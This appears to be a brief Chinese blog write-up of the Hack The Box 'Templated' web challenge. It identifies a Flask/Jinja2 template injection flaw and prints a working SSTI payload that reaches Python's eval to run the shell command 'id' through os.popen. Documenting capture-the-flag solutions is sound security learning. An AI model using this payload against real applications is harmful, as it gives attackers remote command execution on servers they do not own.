HTB-Challenges-Web-Templated

发布于 2022-10-22  354 次阅读


启动实例

访问ip,可以发现网站正在建设中

页面中提示了网站由Flask/Jinja2搭建
这时候联想到模板注入
尝试POC,发现确实存在模板注入漏洞

使用payload读取目录

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

读取flag

届ける言葉を今は育ててる
最后更新于 2022-10-22